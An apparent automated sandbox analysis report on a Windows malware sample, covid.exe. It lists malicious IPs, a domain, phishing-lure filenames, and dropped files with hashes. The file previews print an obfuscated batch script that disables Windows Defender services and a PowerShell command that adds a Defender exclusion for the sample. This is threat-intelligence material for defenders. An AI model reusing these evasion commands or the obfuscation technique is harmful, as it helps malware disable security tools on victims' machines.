172.67.220.147 | w1YYpRG02e.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5B3D301DB51C9B00F70AF37938BE599F.html
172.67.220.147 | ADJUNTOEXTRACTO590878174787097120989222355748.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9A964AADD659F0067F881ACA423BCEDD.html
172.67.220.147 | Factura Serfinanza022880209777477966487010096.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1E6FC8A774533AA394D4580F6DB6838B.html
172.67.220.147 | SERFINANZAEXTRACTO283816558547438357773985414.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9B31D021FF64B2D5D03885F5B17A0908.html
172.67.220.147 | EXTRACTOSERFINANZA596054271198721911813685868.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09E94B6C5260416402DA47E86244BE30.html
172.67.220.147 | Property Details.pdf.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-F02CDE0F9BC55206FC1C6FD48DB295AB.html
172.67.220.147 | Request for Price.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CA312B7AD325B7F976AFB06E92A5151A.html
172.67.220.147 | Invoice & BACS Documen.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E09CECC00887731FA9705E28293E8864.html

                        Domains

Match | Associated Sample Name / URL | Detection | Context
mmwrlridbhmibnr.ml | SecuriteInfo.com.Trojan.Siggen13.10233.30629.exe | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | OFneOuyQDx.exe | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | 2U1aZi86Sw.exe | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | 8TkFgL94vo.exe | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | List.doc | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | QUOTE.doc | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | 7789-2020.doc | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | NEW ORDER.exe | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | URGENT_QUOTATION_PR # 270473. 20-04-2021.exe | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | QUOTE.doc | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | payment receipt.doc | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | QUOTE.doc | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | VZL5ROpeId.exe | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | cLQd2QVOWu.exe | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | item list.doc | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | Orders.exe | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | FneJElVdDf.exe | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | w1YYpRG02e.exe | malicious | 172.67.220.147
mmwrlridbhmibnr.ml | eh1CjskZCs.exe | malicious | 104.21.86.143
mmwrlridbhmibnr.ml | QSN0y9JNF1.exe | malicious | 104.21.86.143

                        ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | AttachementHtm.html | malicious | 104.16.18.94
CLOUDFLARENETUS | 6xrXVxpiSm.exe | malicious | 172.67.133.191
CLOUDFLARENETUS | zj4NVQ6TKa.exe | malicious | 172.67.133.191
CLOUDFLARENETUS | VZshmdIfmC.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | 7wiTGdPpvv.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | 7Wv8cQT117.exe | malicious | 172.67.133.191
CLOUDFLARENETUS | 5PthEm83NG.exe | malicious | 172.67.161.4
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.Siggen13.10233.30629.exe | malicious | 104.21.86.143
CLOUDFLARENETUS | VoicePlayback (0155) for umclune myumanitoba .html | malicious | 104.16.18.94
CLOUDFLARENETUS | apr.20.confirmaci#U0e02n SWIFT.exe | malicious | 162.159.134.233
CLOUDFLARENETUS | Notification_test.htm | malicious | 104.16.19.94
CLOUDFLARENETUS | OFneOuyQDx.exe | malicious | 104.21.86.143
CLOUDFLARENETUS | SecuriteInfo.com.Variant.Bulz.440290.18036.exe | malicious | 172.67.133.191
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.GenericKD.36741716.4036.exe | malicious | 172.67.133.191
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.GenericKD.36740349.3453.exe | malicious | 104.21.14.15
CLOUDFLARENETUS | 4QwdcKOvum.exe | malicious | 104.21.48.10
CLOUDFLARENETUS | 2U1aZi86Sw.exe | malicious | 104.21.86.143
CLOUDFLARENETUS | 8TkFgL94vo.exe | malicious | 172.67.220.147
CLOUDFLARENETUS | List.doc | malicious | 172.67.220.147
CLOUDFLARENETUS | Account Details.exe | malicious | 104.21.19.200

                        JA3 Fingerprints

                        No context

                        Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | 4EQNFqt5Nm.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | URGENT_QUOTATION_PR # 270473. 20-04-2021.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | NEW SUPPLIER FORM.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | payment slip in foldrs.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Discharge - 10,500MT of ZN CONCS - Bukpyung.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | 2021190411466.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | GxRBjQa5k0.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | f1MdIMyl48.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | exALRGzKKl.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | BGUSVBJPtY.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Invoice & BACS Document.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | XwpoNqWEJ2.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Request for Price.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | EARTH SUMMT#U2013MAR21-V01VC.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | EARTH SUMMTMAR21-V01VC.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | NEWURGENTORDER.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Invoice & BACS Documen.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | MV. WINTER SUMMER.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | MV. MCL - 21.exe | malicious
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Require your Sales Ledger from 01-April-2020.exe | malicious

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Users\user\Desktop\covid.exe
File Type: Microsoft Cabinet archive data, 58596 bytes, 1 file
Category: dropped
Size (bytes): 58596
Entropy (8bit): 7.995478615012125
Encrypted: true
SSDEEP: 1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5: 61A03D15CF62612F50B74867090DBE79
SHA1: 15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256: F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512: 5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious: false
Reputation: high, very likely benign file
Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Users\user\Desktop\covid.exe
File Type: data
Category: dropped
Size (bytes): 326
Entropy (8bit): 3.089415833598504
Encrypted: false
SSDEEP: 6:kKLlkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:WwTJrkPlE99SNxAhUe0ht
MD5: 3DCFE99F8D6BBF8BAE4F47092C0C15A0
SHA1: 1C1CBE4F2F25DA8ADC960617F127CA4221786A24
SHA-256: A8413472CF220270F3D50ECD3753AFA5096896C6457668C055E120944DE188B4
SHA-512: FF2A4B7DA2F7D98EB1FF5C5C5C1D7264C072DC6C352A62A425CCC116626B0886B5D817A87A92A0053D9F400FA2A4FC37188A933FAEB3092ABC7B2B2C39526B39
Malicious: false
Reputation: low
Preview: p...... ........bA]ts6..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\covid.exe.log
Process: C:\Users\user\Desktop\covid.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1220
Entropy (8bit): 5.354495486938689
Encrypted: false
SSDEEP: 24:ML9E4Ks2f84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4K+sXE4G1qE4j:MxHKXfviYHKhQnoPtHoxHhAHKzvGHK1d
MD5: 3B495BE0A7E2A57ACC717A4A3DBBD1E8
SHA1: D91F0A7B70C6C55AADEBD64CBBA5831481D3D5ED
SHA-256: D499F90E7622879DCA8ADEC7068D9D8926F33FD6FE9CDA465A7189CA4F4E9A83
SHA-512: A3B7D7326AB1D827E03799CC3E1D79155D757D14C0ABA1E98B612C011629D589B7A85AF8292587F38A81E123AB2BA359D3D20CB0A70B77022B4FE0C2BE96C9AB
Malicious: true
Reputation: low
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 14734
Entropy (8bit): 4.993014478972177
Encrypted: false
SSDEEP: 384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5: 8D5E194411E038C060288366D6766D3D
SHA1: DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256: 44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512: 21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious: false
Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 22184
Entropy (8bit): 5.603143783785762
Encrypted: false
SSDEEP: 384:jtCDK0CcfWXs0JYYSBKnmultIo3D7Y9g9SJUeRa1BMrm7iSRV7yUoI64I+iGq:Dfp4Kmultp339Xehab9+
MD5: 1EEC9310290AB90DC59FA655592CB564
SHA1: 4EE4B16DEFC3D73F4B1712A8A64BEF9D83076A93
SHA-256: 7529B20EB35160F759D52075E8D304EDB39AA55AF9CBB2CF8EECDDA5D93529CC
SHA-512: 696AB9ABAD204E75F06C1EA3AC79A7BA0627DABF4070F2BB38C5DEDD35786142F8B83A5DB6654957AE632AE44CAF7552ECA090316EC5D3C8565BED153522BE41
Malicious: false
Preview: @...e...........c.........../. .........A............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
Process: C:\Users\user\Desktop\covid.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 91000
Entropy (8bit): 6.241345766746317
Encrypted: false
SSDEEP: 1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5: 17FC12902F4769AF3A9271EB4E2DACCE
SHA1: 9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256: 29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512: 036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 4EQNFqt5Nm.exe, Detection: malicious
• Filename: URGENT_QUOTATION_PR # 270473. 20-04-2021.exe, Detection: malicious
• Filename: NEW SUPPLIER FORM.exe, Detection: malicious
• Filename: payment slip in foldrs.exe, Detection: malicious
• Filename: Discharge - 10,500MT of ZN CONCS - Bukpyung.exe, Detection: malicious
• Filename: 2021190411466.exe, Detection: malicious
• Filename: GxRBjQa5k0.exe, Detection: malicious
• Filename: f1MdIMyl48.exe, Detection: malicious
• Filename: exALRGzKKl.exe, Detection: malicious
• Filename: BGUSVBJPtY.exe, Detection: malicious
• Filename: Invoice & BACS Document.exe, Detection: malicious
• Filename: XwpoNqWEJ2.exe, Detection: malicious
• Filename: Request for Price.exe, Detection: malicious
• Filename: EARTH SUMMT#U2013MAR21-V01VC.exe, Detection: malicious
• Filename: EARTH SUMMTMAR21-V01VC.exe, Detection: malicious
• Filename: NEWURGENTORDER.exe, Detection: malicious
• Filename: Invoice & BACS Documen.exe, Detection: malicious
• Filename: MV. WINTER SUMMER.exe, Detection: malicious
• Filename: MV. MCL - 21.exe, Detection: malicious
• Filename: Require your Sales Ledger from 01-April-2020.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat
Process: C:\Users\user\Desktop\covid.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 8399
Entropy (8bit): 4.665734428420432
Encrypted: false
SSDEEP: 192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5: B2A5EF7D334BDF866113C6F4F9036AAE
SHA1: F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256: 27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512: 8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious: false
Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr

C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
Process: C:\Users\user\Desktop\covid.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 91000
Entropy (8bit): 6.241345766746317
Encrypted: false
SSDEEP: 1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5: 17FC12902F4769AF3A9271EB4E2DACCE
SHA1: 9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256: 29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512: 036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfokoedf.q1p.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smbn3d1y.f3r.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tym2jct4.dby.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xz5qrnxd.rfa.ps1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\Documents\20210420\PowerShell_transcript.715575.YAHSjSYP.20210420225944.txt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5805
                                                                Entropy (8bit):5.361307632295367
                                                                Encrypted:false
                                                                SSDEEP:96:BZ4x6qZN4dqDo1ZObCZ+6qZN4dqDo1ZZMyOyUyjZH6qZN4dqDo1ZuJyEyEyNZ+:sl6
                                                                MD5:B4B02164A6FA467E0AE696445D0B6B26
                                                                SHA1:513BEE9D426B22C7CADAB0C99DFCC402B808D470
                                                                SHA-256:3A0D47EEE921355FB29411527205FA13A7A7B7C40D4849007FB54EE75AAA9EF8
                                                                SHA-512:4993411E98C6724182B2EE4C222E867DA2642A06619B7F4C2E7BC0721CC9BE5EDB6DC9B6E1EACC62AB58C2F4DE5F5BAA7F02544E919E2D7B1F627479E7B3A56C
                                                                Malicious:false
                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210420230005..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..Process ID: 6176..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210420230005..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210420230526..Username: computer\user..RunAs User: DESKTOP-716T
                                                                C:\Users\user\Documents\20210420\PowerShell_transcript.715575.kuWr1X7Z.20210420225944.txt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5805
                                                                Entropy (8bit):5.359309757879457
                                                                Encrypted:false
                                                                SSDEEP:96:BZp6qZN4z3qDo1ZVCZO6qZN4z3qDo1ZWMyOyUyjZS6qZN4z3qDo1ZqJyEyEykZ2:4s+x
                                                                MD5:21CE8E1B82258946100644140B7013C5
                                                                SHA1:619FF53A089FA62422ABC029F72C14667F6D749F
                                                                SHA-256:C38AF2408E89FDF430986EC182AFEA49CD22E63B23649D142256895FC1EA7188
                                                                SHA-512:9B37B7B06EC5E9FD029B56FE9214AFA38A208E312A8F78E6465D2B25010E1602CD82AEB022F7F8655F0385EBF8661643C4E22F2C9042247B525DE8FF58C41721
                                                                Malicious:false
